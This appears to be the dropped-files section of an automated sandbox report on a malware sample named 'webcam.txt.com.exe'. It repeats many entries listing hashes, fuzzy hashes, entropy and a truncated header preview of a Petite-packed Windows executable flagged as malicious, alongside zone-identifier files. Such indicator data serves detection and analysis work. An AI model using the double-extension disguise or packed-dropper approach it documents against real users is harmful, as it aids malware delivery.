                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
